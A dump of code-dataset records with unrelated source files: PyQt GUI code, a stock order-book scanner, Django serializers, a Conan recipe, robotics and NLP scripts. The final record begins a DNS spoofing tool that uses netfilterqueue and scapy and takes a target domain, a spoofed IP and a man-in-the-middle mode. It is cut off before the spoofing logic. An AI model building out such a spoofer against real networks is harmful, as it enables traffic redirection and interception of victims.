QtWidgets.QPushButton(self.centralwidget)\r\n self.Customeradd_btn.setGeometry(QtCore.QRect(230, 250, 331, 71))\r\n font = QtGui.QFont()\r\n font.setFamily(\"B Nazanin\")\r\n font.setPointSize(22)\r\n font.setBold(False)\r\n font.setWeight(50)\r\n self.Customeradd_btn.setFont(font)\r\n self.Customeradd_btn.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\r\n self.Customeradd_btn.setStyleSheet(\"QPushButton\\n\"\r\n\"{\\n\"\r\n\"color:rgb(61, 135, 255);\\n\"\r\n\"background-color:white;\\n\"\r\n\"border-radius:20%;\\n\"\r\n\"border: 2px solid rgb(61, 135, 255);\\n\"\r\n\"font-family:B Nazanin, Arial\\n\"\r\n\"}\\n\"\r\n\"QPushButton::pressed\\n\"\r\n\"{\\n\"\r\n\"color:white;\\n\"\r\n\"background-color: rgb(61, 135, 255);\\n\"\r\n\"border-radius:20%;\\n\"\r\n\"border: 2px solid rgb(61, 135, 255);\\n\"\r\n\"font-family:B Nazanin, Arial\\n\"\r\n\"}\")\r\n self.Customeradd_btn.setObjectName(\"Customeradd_btn\")\r\n #Connect pushbutton to costumer signup func\r\n self.Customeradd_btn.clicked.connect(self.gotocustomersignup)\r\n self.selleradd_btn = QtWidgets.QPushButton(self.centralwidget)\r\n self.selleradd_btn.setGeometry(QtCore.QRect(230, 410, 331, 71))\r\n font = QtGui.QFont()\r\n font.setFamily(\"B Nazanin\")\r\n font.setPointSize(22)\r\n font.setBold(False)\r\n font.setWeight(50)\r\n self.selleradd_btn.setFont(font)\r\n self.selleradd_btn.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\r\n self.selleradd_btn.setStyleSheet(\"QPushButton\\n\"\r\n\"{\\n\"\r\n\"color:rgb(61, 135, 255);\\n\"\r\n\"background-color:white;\\n\"\r\n\"border-radius:20%;\\n\"\r\n\"border: 2px solid rgb(61, 135, 255);\\n\"\r\n\"font-family:B Nazanin, Arial\\n\"\r\n\"}\\n\"\r\n\"QPushButton::pressed\\n\"\r\n\"{\\n\"\r\n\"color:white;\\n\"\r\n\"background-color: rgb(61, 135, 255);\\n\"\r\n\"border-radius:20%;\\n\"\r\n\"border: 2px solid rgb(61, 135, 255);\\n\"\r\n\"font-family:B Nazanin, Arial\\n\"\r\n\"}\")\r\n self.selleradd_btn.setObjectName(\"selleradd_btn\")\r\n #Connectc pushbutton to sellersignup func\r\n self.selleradd_btn.clicked.connect(self.gotosellersignup)\r\n self.label = QtWidgets.QLabel(self.centralwidget)\r\n self.label.setGeometry(QtCore.QRect(30, 40, 731, 151))\r\n font = QtGui.QFont()\r\n font.setFamily(\"B Titr\")\r\n font.setPointSize(22)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.label.setFont(font)\r\n self.label.setStyleSheet(\"color:rgb(61, 135, 255);\\n\"\r\n\"font-family:B Titr, Arial\")\r\n self.label.setAlignment(QtCore.Qt.AlignCenter)\r\n self.label.setObjectName(\"label\")\r\n SignupPanel.setCentralWidget(self.centralwidget)\r\n\r\n self.retranslateUi(SignupPanel)\r\n QtCore.QMetaObject.connectSlotsByName(SignupPanel)\r\n self.SignupPanel = SignupPanel\r\n\t\r\n\t#Costumer Signup Panel\r\n def gotocustomersignup(self):\r\n self.customerSignup = QtWidgets.QMainWindow()\r\n self.ui = customer_signup.Ui_CustomerSignup()\r\n self.ui.setupUi(self.customerSignup)\r\n self.customerSignup.show()\r\n self.SignupPanel.close()\r\n\t#Seller Signup panel\r\n def gotosellersignup(self):\r\n self.sellerSignup = QtWidgets.QMainWindow()\r\n self.ui = seller_signup.Ui_SellerSignup()\r\n self.ui.setupUi(self.sellerSignup)\r\n self.sellerSignup.show()\r\n self.SignupPanel.close()\r\n\r\n def retranslateUi(self, SignupPanel):\r\n _translate = QtCore.QCoreApplication.translate\r\n SignupPanel.setWindowTitle(_translate(\"SignupPanel\", \"Sign Up\"))\r\n SignupPanel.setWindowIcon(QIcon('Images/null.png'))\r\n self.Customeradd_btn.setText(_translate(\"SignupPanel\", \"مشتری\"))\r\n self.selleradd_btn.setText(_translate(\"SignupPanel\", \"فروشنده\"))\r\n self.label.setText(_translate(\"SignupPanel\", \"به آنلاین شاپ خوش آمدید\\n\"\r\n\"شیوه ثبت نام را انتخاب کنید\"))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n app = QtWidgets.QApplication(sys.argv)\r\n SignupPanel = QtWidgets.QMainWindow()\r\n ui = Ui_SignupPanel()\r\n ui.setupUi(SignupPanel)\r\n SignupPanel.show()\r\n sys.exit(app.exec_())\r\n","sub_path":"Options/signup_panel.py","file_name":"signup_panel.py","file_ext":"py","file_size_in_byte":4545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"568346604","text":"# from urllib import request\nimport csv\nimport sys\nimport gevent\nimport tushare as ts\nimport datetime\nimport time\nimport os\nimport traceback\nimport datetime\nfrom gevent import monkey\nimport platform\nimport traceback\nimport codecs\nimport math\nfrom os.path import expanduser\n\nmonkey.patch_socket()\nbaseUrl = \"http://qt.gtimg.cn/q=\"\ntoday_str = datetime.datetime.now().strftime(\"%Y%m%d\")\ntoday_str_for_ts = datetime.datetime.now().strftime(\"%Y-%m-%d\")\nyuzhi = 10\nyuzhi_count = 30000\nyuzhi_guo = 500\n\nbase_dir = os.path.join(expanduser(\"~\"), 'news')\nsysstr = platform.system()\nif (sysstr == \"Windows\"):\n base_dir = \"D:\\\\news\"\nelif (sysstr == \"Linux\"):\n print(\"Call Linux tasks\")\n\n\ndef getfloat(value):\n try:\n return float(value)\n except ValueError:\n return 0\n\n\ndef write_file(data, file_name):\n with open(os.path.join(base_dir, file_name), 'a', encoding='utf8', newline='') as csvfile:\n writer = csv.writer(csvfile)\n writer.writerow(data)\n\n\ndef cal(cur_file, code, cur_dir, tmp_code_inc):\n if not os.path.exists(cur_file):\n return\n\n last_time = ''\n last_inc = 0\n ready = []\n with codecs.open(cur_file, \"r\", encoding='utf-8', errors='ignore') as fdata:\n for row in fdata.readlines():\n sa = row.split(',')\n cur_time = sa[0]\n real_time = int(cur_time) % 1000000\n # code = sa[1]\n inc = getfloat(sa[7])\n last_inc = inc\n cur_vol = getfloat(sa[8])\n buy_price_1 = getfloat(sa[9])\n buy_count_1 = getfloat(sa[10])\n buy_price_2 = getfloat(sa[11])\n buy_count_2 = getfloat(sa[12])\n buy_price_3 = getfloat(sa[13])\n buy_count_3 = getfloat(sa[14])\n buy_price_4 = getfloat(sa[15])\n buy_count_4 = getfloat(sa[16])\n buy_price_5 = getfloat(sa[17])\n buy_count_5 = getfloat(sa[18])\n sell_price_1 = getfloat(sa[19])\n sell_count_1 = getfloat(sa[20])\n sell_price_2 = getfloat(sa[21])\n sell_count_2 = getfloat(sa[22])\n sell_price_3 = getfloat(sa[23])\n sell_count_3 = getfloat(sa[24])\n sell_price_4 = getfloat(sa[25])\n sell_count_4 = getfloat(sa[26])\n sell_price_5 = getfloat(sa[27])\n sell_count_5 = getfloat(sa[28])\n\n if last_time == cur_time:\n continue\n last_time = cur_time\n\n if sell_count_5 == 0 or buy_count_5 == 0:\n continue\n\n tot_buy_count = buy_count_1 + buy_count_2 + buy_count_3 + buy_count_4 + buy_count_5\n tot_sell_count = sell_count_1 + sell_count_2 + sell_count_3 + sell_count_4 + sell_count_5\n\n def help_buy(current_count, current_price, total_count, data_wirte):\n if current_count / (\n total_count - current_count + 1) > yuzhi \\\n and current_count * current_price > yuzhi_count \\\n and 93500 < real_time < 145000:\n data_wirte.append([code, 'B', cur_time[:8],cur_time[-6:], current_price, current_count, inc])\n print('----- OH -------', code, 'B', cur_time, current_price, current_count)\n\n def help_sell(current_count, current_price, total_count, data_wirte):\n if current_count / (\n total_count - current_count + 1) > yuzhi \\\n and current_count * current_price > yuzhi_count \\\n and 93500 < real_time < 145000:\n data_wirte.append([code, 'S', cur_time[:8],cur_time[-6:], current_price, current_count, inc])\n print('----- OH -------', code, 'S', cur_time, current_price, current_count)\n\n\n help_sell(sell_count_1, sell_price_1, tot_sell_count, ready)\n help_sell(sell_count_2, sell_price_2, tot_sell_count, ready)\n help_sell(sell_count_3, sell_price_3, tot_sell_count, ready)\n help_sell(sell_count_4, sell_price_4, tot_sell_count, ready)\n help_sell(sell_count_5, sell_price_5, tot_sell_count, ready)\n\n help_buy(buy_count_1, buy_price_1, tot_buy_count, ready)\n help_buy(buy_count_2, buy_price_2, tot_buy_count, ready)\n help_buy(buy_count_3, buy_price_3, tot_buy_count, ready)\n help_buy(buy_count_4, buy_price_4, tot_buy_count, ready)\n help_buy(buy_count_5, buy_price_5, tot_buy_count, ready)\n\n for r in ready:\n r.append(last_inc)\n r.append(tmp_code_inc)\n write_file(r, \"out.csv\")\n return last_inc\n\n\nif __name__ == '__main__':\n codes = ts.get_stock_basics().index.values\n dirs = os.listdir(base_dir)\n\n for code in codes:\n code_inc = -100\n for d in dirs:\n # print(code, ' ---- ', dir)\n code_inc = cal(os.path.join(base_dir, d, code + \".csv\", ), code, d, code_inc)\n","sub_path":"dayk/tc_jieduan.py","file_name":"tc_jieduan.py","file_ext":"py","file_size_in_byte":4975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"161099430","text":"\"\"\"\n49. Group Anagrams\nGiven an array of strings strs, group the anagrams together. \nYou can return the answer in any order.\nAn Anagram is a word or phrase formed by rearranging the letters \nof a different word or phrase, typically using all the original letters exactly once.\n\nExample 1:\nInput: strs = [\"eat\",\"tea\",\"tan\",\"ate\",\"nat\",\"bat\"]\nOutput: [[\"bat\"],[\"nat\",\"tan\"],[\"ate\",\"eat\",\"tea\"]]\nExample 2:\nInput: strs = [\"\"]\nOutput: [[\"\"]]\nExample 3:\nInput: strs = [\"a\"]\nOutput: [[\"a\"]]\n\nConstraints:\n1 <= strs.length <= 104\n0 <= strs[i].length <= 100\nstrs[i] consists of lower-case English letters.\n\"\"\"\nclass Solution:\n def groupAnagrams(self, strs: List[str]) -> List[List[str]]:\n if len(strs)==0:\n return [[\"\"]]\n if len(strs)==1:\n return [strs]\n \n res = []\n tmpD = {}\n \n for i in range(len(strs)):\n tmp = ''.join(sorted(list(strs[i])))\n if tmp not in tmpD :\n tmpD[tmp] = [strs[i]]\n else :\n tmpD[tmp].append(strs[i])\n #print(tmpD)\n for tmp in tmpD :\n res.append(tmpD[tmp])\n return res\n \n","sub_path":"LeetCode_exercises/ex0049_groupAnagrams.py","file_name":"ex0049_groupAnagrams.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"537233287","text":"import os\nimport glob\nfrom conans import ConanFile, CMake, tools\nfrom conans.errors import ConanInvalidConfiguration\n\nclass BxConan(ConanFile):\n name = \"bx\"\n description = \"Base library used across multiple projects.\"\n license = \"BSD-2-Clause\"\n topics = (\"conan\", \"bx\")\n homepage = \"https://github.com/bkaradzic/bx\"\n url = \"https://github.com/conan-io/conan-center-index\"\n exports_sources = [\"CMakeLists.txt\"]\n generators = \"cmake\"\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n options = {\n \"fPIC\": [True, False],\n }\n default_options = {\n \"fPIC\": True,\n }\n\n @property\n def _source_subfolder(self):\n return \"source_subfolder\"\n\n @property\n def _build_subfolder(self):\n return \"build_subfolder\"\n\n def config_options(self):\n if self.settings.os == 'Windows':\n del self.options.fPIC\n\n def configure(self):\n minimal_cpp_standard = \"14\"\n if self.settings.compiler.cppstd:\n tools.check_min_cppstd(self, minimal_cpp_standard)\n minimal_version = {\n \"gcc\": \"5\",\n \"clang\": \"3.4\",\n \"apple-clang\": \"10\",\n \"Visual Studio\": \"15\"\n }\n compiler = str(self.settings.compiler)\n if compiler not in minimal_version:\n self.output.warn(\n \"%s recipe lacks information about the %s compiler standard version support\" % (self.name, compiler))\n self.output.warn(\n \"%s requires a compiler that supports at least C++%s\" % (self.name, minimal_cpp_standard))\n return\n version = tools.Version(self.settings.compiler.version)\n if version < minimal_version[compiler]:\n raise ConanInvalidConfiguration(\"%s requires a compiler that supports at least C++%s\" % (self.name, minimal_cpp_standard))\n\n def source(self):\n tools.get(**self.conan_data[\"sources\"][self.version])\n extracted_dir = glob.glob('bx-*/')[0]\n os.rename(extracted_dir, self._source_subfolder)\n\n def _configure_cmake(self):\n cmake = CMake(self)\n cmake.configure(build_folder=self._build_subfolder)\n return cmake\n\n def build(self):\n cmake = self._configure_cmake()\n cmake.build()\n\n def package(self):\n cmake = self._configure_cmake()\n cmake.install()\n self.copy(pattern=\"LICENSE\", dst=\"licenses\", src=self._source_subfolder)\n\n def package_info(self):\n self.cpp_info.libs = tools.collect_libs(self)\n self.cpp_info.includedirs.append(os.path.join(\"include\", \"bx\", \"compat\"))\n if self.settings.os == \"Linux\":\n self.cpp_info.system_libs = [\"dl\", \"pthread\", \"rt\"]\n if self.settings.os == \"Macos\":\n self.cpp_info.frameworks = [\"Foundation\"]\n","sub_path":"recipes/bx/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"632233994","text":"\"\"\"\n\n\tAuthor : John Turner\n\tVersion: 2.0\n\t\n\tLast Updated: 8/29/15\n\tUpdated By : John Turner\n\t\n\tFile that will contain all of the serializers for the REST API calls from the iPad App\n\tto the web server. \n\n\"\"\"\n\nfrom rest_framework import serializers\nfrom base_app import models as mod\nimport datetime\n\n# Serializer class for the Company model\nclass CompanySerializer(serializers.ModelSerializer):\n\n\tclass Meta:\n\t\tmodel = mod.Company\n\n# Serializer class for the User model\nclass UserSerializer(serializers.ModelSerializer):\n\n\tclass Meta: \n\t\tmodel = mod.User\n\t\tfields = ('id','first_name','last_name','password','email','company',)\n\t\twrite_only_fields = ('password',)\n\n\tdef create(self, validated_data):\n\t\t\"\"\"\n\t\tCall set_password so the password isn't stored in plain text\n\t\tAlso adds the user to the Recruiter group.\n\t\t\"\"\"\n\n\t\tuser = mod.User(\n\t\t\temail =validated_data['email'],\n\t\t\tfirst_name =validated_data['first_name'],\n\t\t\tlast_name =validated_data['last_name'],\n\t\t\tcompany =validated_data['company']\n\t\t)\n\t\tuser.set_password(validated_data['password'])\n\n\t\tuser.save()\n\n\t\t# Add recruiter to the recruiter group\n\t\tgroup = mod.Group.objects.get(name='Recruiter')\n\t\tgroup.user_set.add(user)\n\n\t\treturn user\n\n# Serializer class for the Vehicle model\nclass VehicleSerializer(serializers.ModelSerializer):\n\n\tclass Meta:\n\t\tmodel = mod.Vehicle\n\n# Serializer class for the SaladDressing model\nclass SaladDressingSerializer(serializers.ModelSerializer):\n\n\tclass Meta:\n\t\tmodel = mod.SaladDressing\n\n# Serializer class for the MenuItem model\nclass MenuItemSerializer(serializers.ModelSerializer):\n\n\tdefault_dressing = SaladDressingSerializer(read_only=True, required=False)\n\tphoto = serializers.SerializerMethodField('get_image_url')\n\n\tclass Meta:\n\t\tmodel = mod.MenuItem\n\t\tread_only_fields = ('name','photo','category','description',)\n\n\tdef get_image_url(self, obj):\n\t\ttry:\n\t\t\tphoto = obj.photo.url\n\t\texcept ValueError:\n\t\t\tphoto = None\n\n\t\treturn photo\n\n# Serializer class for the CheckIn model\nclass CheckInSerializer(serializers.ModelSerializer):\n\n\tclass Meta:\n\t\tmodel = mod.CheckIn\n\n\tdef create(self, validated_data):\n\t\t\"\"\"\n\t\tMake sure to look up the recruiter according to the id \n\t\tthat the app passes\n\t\t\"\"\"\n\n\t\tcheck_in = mod.CheckIn()\n\t\tcheck_in.date = datetime.datetime.now()\n\t\tcheck_in.recruiter = validated_data['recruiter']\n\n\t\tcheck_in.save()\n\n\t\treturn check_in\n\n# Serializer class for the LunchOrder model\nclass LunchOrderSerializer(serializers.ModelSerializer):\n\n\tclass Meta:\n\t\tmodel = mod.LunchOrder\n\n\tdef create(self, validated_data):\n\t\t\"\"\"\n\t\tMake sure that all of the different relationships passed in from the \n\t\tapp are correctly set before saving the LunchOrder\n\t\t\"\"\"\n\n\t\tprint(\"<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>\")\n\n\t\tlunch_order = mod.LunchOrder()\n\t\tlunch_order.check_in = validated_data['check_in']\n\t\tlunch_order.dessert = validated_data['dessert']\n\t\tlunch_order.menu_item = validated_data['menu_item']\n\t\tlunch_order.date = datetime.datetime.now()\n\n\t\t# Check to see if there is a salad dressing at all\n\t\tif 'salad_dressing' in validated_data:\n\t\t\tif validated_data['salad_dressing'] != \"\":\n\t\t\t\tlunch_order.salad_dressing = validated_data['salad_dressing']\n\n\t\t# Save the lunch order, then add the ingredients to it\n\t\tlunch_order.save()\n\n\t\tif 'ingredients' in validated_data:\n\t\t\tfor ingredient in validated_data['ingredients']:\n\t\t\t\tlunch_order.ingredients.add(ingredient)\n\n\t\tlunch_order.save()\n\n\t\treturn lunch_order\n\n# Serializer class for the ingredients\nclass IngredientSerializer(serializers.ModelSerializer):\n\n\tclass Meta:\n\t\tmodel = mod.Ingredient\n\n# Serializer class for the Desserts\nclass DessertSerializer(serializers.ModelSerializer):\n\t\n\tclass Meta:\n\t\tmodel = mod.Dessert","sub_path":"base_app/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"394367864","text":"from flask import Flask, jsonify, render_template\nfrom flask_socketio import SocketIO, emit\nimport sqlite3\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'arnsetiorsn'\nsocketio = SocketIO(app)\n\nUSERS = 'users.db'\n# with sqlite3.connect(USERS) as db:\n# cursor = db.cursor()\n# cursor.execute('CREATE TABLE users (username TEXT, secret INTEGER)')\n# cursor.execute('INSERT INTO users VALUES (\"admin\", 0)')\n\n\n@app.route('/')\ndef index():\n return render_template('test.html')\n with sqlite3.connect(USERS) as db:\n cursor = db.cursor()\n secret = cursor.execute(\n 'SELECT secret FROM users WHERE username = \"admin\"').fetchall()\n cursor.execute(\n 'UPDATE users SET secret = ? WHERE username = \"admin\"', (secret[0][0] + 1,))\n return jsonify(secret)\n\n\n@socketio.on('upload')\ndef message(text):\n emit('download', text)\n\n\nif __name__ == '__main__':\n socketio.run(app)\n","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"307736764","text":"# -*- coding: utf-8 -*-\n\"\"\"SIP Master Controller (REST).\"\"\"\nimport os\n\nimport redis\nfrom flask import request\nfrom flask_api import FlaskAPI, status\n\n\nAPP = FlaskAPI(__name__)\nDB = redis.Redis(host=os.getenv('DATABASE_HOST'))\n\n\n@APP.route('/')\ndef root():\n \"\"\".\"\"\"\n return {\n \"message\": \"Welcome to the SIP Master Controller\",\n \"_links\": {\n \"items\": [\n {\"href\": \"{}state\".format(request.url)}\n ]\n }\n }\n\n\n@APP.route('/state', methods=['GET', 'PUT'])\ndef state():\n\n \"\"\"Return the SDP State.\"\"\"\n states = ['OFF', 'INIT', 'STANDBY', 'ON', 'DISABLE', 'FAULT', 'ALARM',\n 'UNKNOWN']\n\n if request.method == 'PUT':\n requested_state = request.data.get('state', '').upper()\n if requested_state not in states:\n return ({'error': 'Invalid state: {}'.format(requested_state),\n 'allowed_states': states},\n status.HTTP_400_BAD_REQUEST)\n response = {'message': 'Accepted state: {}'.format(requested_state)}\n try:\n DB.set('state', requested_state)\n except redis.exceptions.ConnectionError:\n response['error'] = 'Unable to connect to database.'\n return response\n\n try:\n current_state = DB.get('state')\n if current_state is None:\n DB.set('state', 'INIT')\n current_state = 'INIT'\n else:\n current_state = current_state.decode('utf-8')\n return {'state': '{}'.format(current_state)}\n except redis.exceptions.ConnectionError:\n return {'state': 'UNKNOWN',\n 'error': 'Unable to connect to database.'}\n","sub_path":"sip/execution_control/master_controller/rest/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"288598955","text":"# the file allStar_v603_good_vscat_starflag_teff_logg_aspcapflags.fits was\n# created using topcat, and contains all of the bad star information except\n# for the PARAMFLAG (topcat couldn't read it)\n# so, excise the stars with bad PARAMFLAG...\n\nimport pyfits\nimport numpy as np\n\nfilein = \"allStar_v603_good_vscat_starflag_teff_logg_aspcapflags.fits\"\nhdulist = pyfits.open(filein)\na = hdulist[1].data\nparamflag = a['PARAMFLAG']\nteff_flag = paramflag[:,0] != 0\nlogg_flag = paramflag[:,1] != 0\nmh_flag = paramflag[:,3] != 0\nalpha_flag = paramflag[:,4] != 0\nparamflag_bad = teff_flag | logg_flag | mh_flag | alpha_flag\nnstars = len(paramflag_bad)\nids = a['APOGEE_ID']\nhdulist.close()\n\ninputf = \"allStar_v603_good_vscat_starflag_teff_logg_aspcapflags.txt\"\napogee_id_all = np.loadtxt(inputf, usecols=(0,), dtype=str)\nlabels_all = np.loadtxt(inputf, usecols=(1,2,3,4,5,6,7,8), dtype=float)\napogee_id = apogee_id_all[~paramflag_bad]\nlabels = labels_all[~paramflag_bad]\n\nnp.savez(\"apogee_dr12_labels\", apogee_id, labels)\n","sub_path":"data/apogee_DR12/labels/excise_bad_paramflag.py","file_name":"excise_bad_paramflag.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"255628113","text":"# В единственной строке записан текст. Для каждого слова из данного текста подсчитайте, \n# сколько раз оно встречалось в этом тексте.\n# Задачу необходимо решить с использованием словаря.\n\nfrom pprint import pprint\n\ninp = input('Введите строку: ')\nlst = inp.split(' ')\ndct = {}\n\nfor element in lst:\n if element in dct:\n dct[element] += 1\n else:\n dct[element] = 1\n\npprint(dct)","sub_path":"7.3 — DictTimes.py","file_name":"7.3 — DictTimes.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"550760538","text":"# Copyright 2017 Big Ladder Software LLC, All rights reserved.\n# \n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# \n# (1) Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# \n# (2) Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n# \n# (3) Neither the name of the copyright holder nor the names of its\n# contributors may be used to endorse or promote products derived from this\n# software without specific prior written permission. \n# \n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER, THE UNITED STATES\n# GOVERNMENT, OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\n# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF\n# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nimport json\nimport main\n\nREPO_URL = \"https://github.com/lbl-srg/modelica-buildings\"\nNEW_BRANCH = \"master\"\nOLD_BRANCH = \"v4.0.0\"\nOLD_API_FILE = \"api-\" + OLD_BRANCH + \".json\"\nNEW_API_FILE = \"api-\" + NEW_BRANCH + \".json\"\nDIFFS_FILE = \"diffs-\" + NEW_BRANCH + \"-vs-\" + OLD_BRANCH + \".json\"\n\nmain.clone_repo_to(REPO_URL, OLD_BRANCH, OLD_BRANCH)\nmain.clone_repo_to(REPO_URL, NEW_BRANCH, NEW_BRANCH)\nmain.call_api_generator(OLD_BRANCH, OLD_API_FILE)\nmain.call_api_generator(NEW_BRANCH, NEW_API_FILE)\nmain.call_version_checker(OLD_API_FILE, NEW_API_FILE, DIFFS_FILE)\n\nwith open(OLD_API_FILE) as fid:\n old_data = fid.read()\nwith open(NEW_API_FILE) as fid:\n new_data = fid.read()\nwith open(DIFFS_FILE) as fid:\n diff_data = fid.read()\n\nold_api = json.loads(old_data)\nnew_api = json.loads(new_data)\ndiffs = json.loads(diff_data)\n","sub_path":"UsageExample/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"565559440","text":"# coding: utf-8\nimport os\nimport sys\n# 在当前路径执行django 功能类似manage.py\nsys.path.append('C:\\\\NLPengine')\nos.environ['DJANGO_SETTINGS_MODULE'] = 'NLPengine.settings'\nfrom query.models import TagList\nfrom fermiNLP import gl\nimport logging\nlogging.basicConfig(level=logging.INFO, format='%(message)s', datefmt='%a, %d %b %Y %H:%M:%S')\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\n\nif __name__ == '__main__':\n uniTags = []\n TagsHeat = []\n logging.info('Start Building TagList')\n for i in range(0, gl.topicCount):\n a = gl.lda.show_topic(topicid=i, topn=10)\n for j in a:\n uniTags.append(j[1])\n logging.info('Remove duplicate tags')\n uniTags = set(uniTags)\n logging.info('Save Tag to DB')\n for i in uniTags:\n tag = TagList(tag=i)\n tag.save()\n logging.info('TagList contribution Complete!')\n","sub_path":"query/TagList.py","file_name":"TagList.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"223970149","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 12\n\n@author: enrique benavides\n\"\"\"\n\nimport sim\nimport sys\nimport time\nimport numpy as np\n\nN = 4\n\n##### Conexión con Coppelia #####\nsim.simxFinish(-1) # Cerrar conexiones existentes\nclientID=sim.simxStart('127.0.0.1',19997,True,True,5000,5) # Conectarse a Coppelia\n\nif clientID!=-1:\n print (\"Iniciar conexion con servidor API\")\nelse:\n print (\"Fallo de conexion\")\n sys.exit('Saliendo')\n\n\nROBOT = [\"lumibot_Frame\"]\nROBOT_LM = [\"lumibot_leftMotor\"]\nROBOT_RM = [\"lumibot_rightMotor\"]\nfor i in range(N-1):\n ROBOT.append(\"lumibot_Frame#\" + str(i))\n ROBOT_LM.append(\"lumibot_leftMotor#\" + str(i+1))\n ROBOT_RM.append(\"lumibot_rightMotor#\" + str(i+1))\n\nRAMxx = []\nRAMxx_LM = []\nRAMxx_RM = []\nfor i in range(N):\n eCode, LM = sim.simxGetObjectHandle(clientID, ROBOT_LM[i], sim.simx_opmode_oneshot_wait)\n RAMxx_LM.append(LM)\n eCode, RM = sim.simxGetObjectHandle(clientID, ROBOT_RM[i], sim.simx_opmode_oneshot_wait)\n RAMxx_RM.append(RM)\n eCode, RAM = sim.simxGetObjectHandle(clientID, ROBOT[i], sim.simx_opmode_oneshot_wait)\n RAMxx.append(RAM)\n \nX0 = []\nY0 = []\nXi0 = []\nfor i in range(N):\n eCode, pos_par = sim.simxGetObjectPosition(clientID, RAMxx[i], -1, sim.simx_opmode_streaming)\n eCode, ori_par = sim.simxGetObjectOrientation(clientID, RAMxx[i], -1, sim.simx_opmode_streaming)\n time.sleep(0.2)\n eCode, pos_par = sim.simxGetObjectPosition(clientID, RAMxx[i], -1, sim.simx_opmode_buffer)\n eCode, ori_par = sim.simxGetObjectOrientation(clientID, RAMxx[i], -1, sim.simx_opmode_buffer)\n \n X0 = np.append(X0,pos_par[0])\n Y0 = np.append(Y0,pos_par[1])\n Xi0 = np.append(Xi0,ori_par[2])\n \nprint ('Cerrar conexion con servidor API')\ntime.sleep(1)\nsim.simxFinish(-1)","sub_path":"CONDA/00Tesis/PruebaMultiRobots.py","file_name":"PruebaMultiRobots.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"213693204","text":"#!/usr/bin/env python\n\nimport netfilterqueue # provides access to packets matched by an iptables rule in Linux. Packets so matched can be accepted, dropped, altered, or given a mark.\nimport scapy.all as scapy # handle tasks like scanning and network discovery\nimport argparse # get values as arguments\nimport subprocess # run() function for shell commands\n\n\n# function that handles the user arguments\ndef get_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-t\", \"--target\", dest=\"target\", help=\"Target domain name.\")\n parser.add_argument(\"-i\", \"--ip\", dest=\"ip\", help=\"Modified IP.\")\n parser.add_argument(\"-p\", \"--preference\", dest=\"preference\", help=\"0 for local, 1 for man-in-the-middle.\")\n parser.add_argument(\"-q\", \"--queue\", dest=\"queue_num\", help=\"Number(int) of queue.\")\n options = parser.parse_args()\n if not options.target:\n parser.error(\"[-] Please specify a target, use --help for more info.\")\n elif not options.ip:\n parser.error(\"[-] Please specify an ip, use --help for more info.\")\n elif not options.preference in [\"0\", \"1\"]:\n parser.error(\"[-] Please specify a preference, use --help for more info.\")\n elif not options.queue_num:\n parser.error(\"[-] Please specify a queue number, use --help for more info.\")\n elif not options.queue_num.isdigit():\n parser.error(\"[-] Queue number must be of 